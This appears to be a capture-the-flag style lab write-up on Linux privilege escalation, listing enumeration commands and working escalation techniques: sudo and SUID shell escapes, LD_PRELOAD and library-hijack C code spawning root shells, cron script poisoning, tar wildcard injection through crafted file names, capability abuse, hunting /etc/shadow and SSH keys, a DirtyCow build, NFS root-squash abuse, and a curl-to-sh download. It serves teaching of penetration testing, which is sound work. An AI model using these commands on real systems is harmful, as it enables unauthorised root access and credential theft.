Linux PrivEsc

intermediate1h 30mWriteup

Practice Linux privilege escalation

Learning Objectives

  • Multiple privesc vectors
  • Kernel exploits
  • SUID exploitation
  • Cron job abuse

Linux Privilege Escalation is the art of going from a low-privileged user to root. This room covers the essential techniques every pentester needs: SUID binaries, sudo misconfigurations, cron jobs, kernel exploits, and more!

Privilege escalation is like being invited to a party but wanting access to the VIP room. You're already inside - now you need to convince the bouncer (the kernel) that you belong in the restricted area!

Initial Enumeration

bash
1606070;"># System Information
2hostname
3uname -a          606070;"># Kernel version (for exploits)
4cat /etc/issue    606070;"># Distribution info
5cat /etc/os-release
6 
7606070;"># User Information
8whoami
9id                606070;"># Groups can reveal access
10cat /etc/passwd   606070;"># All users
11cat /etc/shadow   606070;"># Passwords (if readable!)
12 
13606070;"># Network Information
14ip addr           606070;"># or ifconfig
15netstat -antup    606070;"># Listening services
16ss -tulpn         606070;"># Modern alternative
17 
18606070;"># Running Processes
19ps aux            606070;"># All processes
20ps aux | grep root 606070;"># Root processes

LinPEAS

Run LinPEAS for automated enumeration. It checks everything and highlights findings in color. Download from GitHub and run:curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Sudo Exploitation

bash
1606070;"># Check sudo permissions
2sudo -l
3 
4606070;"># Common exploitable entries:
5 
6606070;"># 1. Run anything as root
7(root) NOPASSWD: ALL
8sudo su -
9 
10606070;"># 2. Specific binary (check GTFOBins!)
11(root) NOPASSWD: /usr/bin/vim
12sudo vim -c 606070;">#a5d6ff;">':!/bin/bash'
13 
14606070;"># 3. Environment variables
15env_keep+=LD_PRELOAD
16606070;"># Create malicious shared library
17 
18606070;"># 4. Shell escapes
19(root) NOPASSWD: /usr/bin/less /var/log/*
20sudo less /var/log/syslog
21!/bin/bash
22 
23606070;"># GTFOBins quick reference:
24606070;"># vim: :!/bin/bash
25606070;"># less/more: !/bin/bash
26606070;"># find: -exec /bin/bash ;
27606070;"># nmap: --interactive then !sh (old versions)
28606070;"># awk: BEGIN {system("/bin/bash")}
29606070;"># python: import os; os.system("/bin/bash")
bash
1606070;"># LD_PRELOAD Exploitation
2606070;"># If sudo has: env_keep+=LD_PRELOAD
3 
4606070;"># Create malicious shared library:
5cat > /tmp/shell.c << 606070;">#a5d6ff;">'EOF'
6606070;">#include <stdio.h>
7606070;">#include <sys/types.h>
8606070;">#include <stdlib.h>
9 
10void _init() {
11    unsetenv(606070;">#a5d6ff;">"LD_PRELOAD");
12    setgid(0);
13    setuid(0);
14    system(606070;">#a5d6ff;">"/bin/bash");
15}
16EOF
17 
18gcc -fPIC -shared -nostartfiles -o /tmp/shell.so /tmp/shell.c
19sudo LD_PRELOAD=/tmp/shell.so /usr/bin/allowed_binary

SUID Exploitation

bash
1606070;"># Find SUID binaries
2find / -perm -u=s -type f 2>/dev/null
3find / -perm -4000 -type f 2>/dev/null
4 
5606070;"># Find SGID binaries
6find / -perm -g=s -type f 2>/dev/null
7 
8606070;"># Common SUID exploits:
9 
10606070;"># Custom/unusual SUID binary
11606070;"># Analyze with strings, ltrace, strace
12 
13606070;"># SUID copy of bash
14/usr/bin/bash_copy -p
15 
16606070;"># nmap (old interactive mode)
17nmap --interactive
18!sh
19 
20606070;"># find
21find . -exec /bin/bash -p ; -quit
22 
23606070;"># vim
24vim -c 606070;">#a5d6ff;">':py import os; os.execl("/bin/bash", "bash", "-p")'
SUID binaries run with owner's permissions (usually root). A vulnerable SUID binary is an instant privesc vector!
bash
1606070;"># Shared Library Hijacking
2606070;"># If SUID binary loads library from writable path
3 
4606070;"># Check library dependencies
5ldd /usr/local/bin/suid-binary
6 
7606070;"># Check library search order
8strace /usr/local/bin/suid-binary 2>&1 | grep open
9 
10606070;"># If it tries to load from writable directory:
11cat > /tmp/libcustom.c << 606070;">#a5d6ff;">'EOF'
12606070;">#include <stdio.h>
13606070;">#include <stdlib.h>
14 
15static void inject() __attribute__((constructor));
16 
17void inject() {
18    setuid(0);
19    system(606070;">#a5d6ff;">"/bin/bash -p");
20}
21EOF
22 
23gcc -shared -fPIC -o /path/to/writable/libcustom.so /tmp/libcustom.c

Cron Job Exploitation

bash
1606070;"># View cron jobs
2cat /etc/crontab
3ls -la /etc/cron.*
4crontab -l
5cat /var/spool/cron/crontabs/*
6 
7606070;"># Monitor processes for cron (pspy tool)
8./pspy64
9 
10606070;"># Exploitation scenarios:
11 
12606070;"># 1. Writable cron script
13echo 606070;">#a5d6ff;">'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /path/to/cron/script.sh
14606070;"># Wait for cron, then:
15/tmp/bash -p
16 
17606070;"># 2. PATH manipulation
18606070;"># If cron runs: script.sh (without full path)
19606070;"># And PATH=/home/user:...
20echo 606070;">#a5d6ff;">'/bin/bash' > /home/user/script.sh
21chmod +x /home/user/script.sh
22 
23606070;"># 3. Wildcard injection (tar)
24606070;"># Cron: cd /dir && tar czf backup.tar.gz *
25echo 606070;">#a5d6ff;">'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /dir/shell.sh
26touch /dir/--checkpoint=1
27touch /dir/--checkpoint-action=exec=sh shell.sh
Cron jobs run as their owner (often root). If you can modify what they execute, you inherit their privileges!

Capabilities

bash
1606070;"># Find binaries with capabilities
2getcap -r / 2>/dev/null
3 
4606070;"># Dangerous capabilities:
5606070;"># CAP_SETUID - change UID
6606070;"># CAP_SETGID - change GID
7606070;"># CAP_DAC_READ_SEARCH - bypass file read permissions
8606070;"># CAP_DAC_OVERRIDE - bypass all file permissions
9606070;"># CAP_NET_BIND_SERVICE - bind to ports < 1024
10 
11606070;"># Python with cap_setuid
12/usr/bin/python3 = cap_setuid+ep
13/usr/bin/python3 -c 606070;">#a5d6ff;">'import os; os.setuid(0); os.system("/bin/bash")'
14 
15606070;"># tar with cap_dac_read_search
16tar -cvf shadow.tar /etc/shadow
17tar -xvf shadow.tar

Password Hunting

bash
1606070;"># Configuration files
2grep -r 606070;">#a5d6ff;">"password" /var/www/ 2>/dev/null
3grep -r 606070;">#a5d6ff;">"pass" /etc/ 2>/dev/null
4find / -name 606070;">#a5d6ff;">"*.config" -exec grep -l "password" {} ; 2>/dev/null
5 
6606070;"># History files
7cat ~/.bash_history
8cat ~/.mysql_history
9cat ~/.nano_history
10 
11606070;"># SSH keys
12find / -name 606070;">#a5d6ff;">"id_rsa" 2>/dev/null
13find / -name 606070;">#a5d6ff;">"*.pem" 2>/dev/null
14cat ~/.ssh/id_rsa
15 
16606070;"># Database files
17cat /var/www/html/config.php
18cat /var/www/html/wp-config.php
19 
20606070;"># Shadow file (if readable)
21cat /etc/shadow
22606070;"># Crack with john:
23john --wordlist=rockyou.txt shadow.txt

Kernel Exploits

bash
1606070;"># Get kernel version
2uname -r
3cat /proc/version
4 
5606070;"># Search for exploits
6searchsploit linux kernel 4.4.0
7searchsploit linux kernel ubuntu
8 
9606070;"># Famous kernel exploits:
10606070;"># - DirtyCow (CVE-2016-5195) - Linux < 4.8.3
11606070;"># - DirtyPipe (CVE-2022-0847) - Linux 5.8+
12606070;"># - PwnKit (CVE-2021-4034) - pkexec
13 
14606070;"># DirtyCow example
15searchsploit -m linux/local/40839.c
16gcc -pthread 40839.c -o dirty -lcrypt
17./dirty
18 
19606070;"># Use linux-exploit-suggester
20./linux-exploit-suggester.sh
Kernel exploits can crash systems! Always have permission and a backup plan. Use them as a last resort after other methods fail.

NFS Misconfiguration

bash
1606070;"># Check NFS exports
2cat /etc/exports
3showmount -e TARGET_IP
4 
5606070;"># Look for no_root_squash
6606070;"># This means root on client = root on server!
7 
8606070;"># Exploitation (from attacker):
9mount -o rw,vers=2 TARGET_IP:/share /tmp/mount
10cd /tmp/mount
11cp /bin/bash .
12chmod +s bash
13 
14606070;"># On target:
15/share/bash -p

Knowledge Check

Quick Quiz
Question 1 of 2

What does the -p flag do with a SUID bash binary?

Key Takeaways

  • Always start with sudo -l - it's the quickest win
  • SUID binaries with shell escapes are instant root
  • Cron jobs running writable scripts = code execution as cron's user
  • Capabilities can be as powerful as SUID
  • GTFOBins is your bible for sudo/SUID exploitation
  • Kernel exploits are last resort - risky but effective